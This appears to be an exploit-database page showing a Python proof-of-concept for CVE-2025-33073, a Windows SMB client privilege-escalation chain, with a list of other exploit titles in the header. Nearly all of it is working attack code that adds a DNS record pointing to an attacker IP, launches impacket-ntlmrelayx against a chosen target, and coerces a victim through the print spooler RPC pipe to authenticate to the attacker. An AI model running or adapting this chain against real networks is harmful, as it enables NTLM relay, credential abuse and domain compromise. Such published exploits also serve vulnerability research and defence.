
15 changes to exploits/shellcodes/ghdb AirKeyboard iOS App 1.0.5 - Remote Input Injection Parrot and DJI variants Drone OSes - Kernel Panic Exploit Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation PHP CGI Module 8.3.4 - Remote Code Execution (RCE) Microsoft Excel Use After Free - Local Code Execution PCMan FTP Server 2.0.7 - Buffer Overflow PCMan FTP Server 2.0.7 - Remote Buffer Overflow WebDAV Windows 10 - Remote Code Execution (RCE) Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
121 lines
No EOL
4.9 KiB
Python
Executable file
121 lines
No EOL
4.9 KiB
Python
Executable file
#!/usr/bin/env python3
|
|
# Exploit Title: Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
|
|
# Author: Mohammed Idrees Banyamer
|
|
# Instagram: @banyamer_security
|
|
# GitHub: https://github.com/mbanyamer
|
|
# Date: 2025-06-13
|
|
# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
|
|
# CVE: CVE-2025-33073
|
|
# Type: Remote
|
|
# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
|
|
# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
|
|
# User Interaction: Required (authenticated domain user)
|
|
# Remediation Level: Official Fix Available
|
|
#
|
|
# Affected Versions:
|
|
# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)
|
|
# - Windows Server 2022 (including 23H2 editions)
|
|
# - Windows Server 2019
|
|
# - Windows 10 versions from 1507 up to 22H2
|
|
# - Windows Server 2016 and 2008 (with appropriate versions)
|
|
#
|
|
# Description:
|
|
# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,
|
|
# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,
|
|
# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server
|
|
# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),
|
|
# Windows Server 2022, and earlier versions vulnerable to this method.
|
|
#
|
|
#
|
|
# Note: The exploit requires the victim to be an authenticated domain user and the environment
|
|
# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).
|
|
#
|
|
# DISCLAIMER: For authorized security testing and educational use only.
|
|
|
|
import argparse
|
|
import subprocess
|
|
import socket
|
|
import time
|
|
import sys
|
|
|
|
def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
|
|
print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
|
|
cmd = [
|
|
"samba-tool", "dns", "add", dns_ip, dc_fqdn,
|
|
record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
|
|
]
|
|
try:
|
|
subprocess.run(cmd, check=True)
|
|
print("[+] DNS record successfully added.")
|
|
except subprocess.CalledProcessError:
|
|
print("[!] Failed to add DNS record. Check credentials and connectivity.")
|
|
sys.exit(1)
|
|
|
|
def check_record(record_name):
|
|
print("[*] Verifying DNS record propagation...")
|
|
for i in range(10):
|
|
try:
|
|
result = socket.gethostbyname_ex(record_name)
|
|
if result and result[2]:
|
|
print(f"[+] DNS record resolved to: {result[2]}")
|
|
return True
|
|
except socket.gaierror:
|
|
time.sleep(2)
|
|
print("[!] DNS record did not propagate or resolve.")
|
|
return False
|
|
|
|
def start_ntlmrelay(target):
|
|
print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
|
|
try:
|
|
subprocess.Popen([
|
|
"impacket-ntlmrelayx", "-t", target, "--no-smb-server"
|
|
])
|
|
print("[*] NTLM relay server started.")
|
|
except Exception as e:
|
|
print(f"[!] Failed to start NTLM relay server: {e}")
|
|
sys.exit(1)
|
|
|
|
def trigger_coercion(victim_ip, fake_host):
|
|
print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
|
|
cmd = [
|
|
"rpcping",
|
|
"-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
|
|
"-s", fake_host,
|
|
"-e", "1234",
|
|
"-a", "n",
|
|
"-u", "none",
|
|
"-p", "none"
|
|
]
|
|
try:
|
|
subprocess.run(cmd, check=True)
|
|
print("[+] Coercion RPC call sent successfully.")
|
|
except subprocess.CalledProcessError:
|
|
print("[!] RPC coercion failed. Verify victim connectivity and service status.")
|
|
sys.exit(1)
|
|
|
|
def main():
|
|
parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
|
|
parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
|
|
parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
|
|
parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller")
|
|
parser.add_argument("--target", required=True, help="Target system to relay authentication to")
|
|
parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
|
|
args = parser.parse_args()
|
|
|
|
record = "relaytrigger"
|
|
fqdn = f"{record}.{args.dc_fqdn}"
|
|
|
|
inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)
|
|
if not check_record(fqdn):
|
|
print("[!] DNS verification failed, aborting.")
|
|
sys.exit(1)
|
|
|
|
start_ntlmrelay(args.target)
|
|
time.sleep(5) # Wait for relay server to be ready
|
|
|
|
trigger_coercion(args.victim_ip, fqdn)
|
|
|
|
print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")
|
|
|
|
if __name__ == "__main__":
|
|
main() |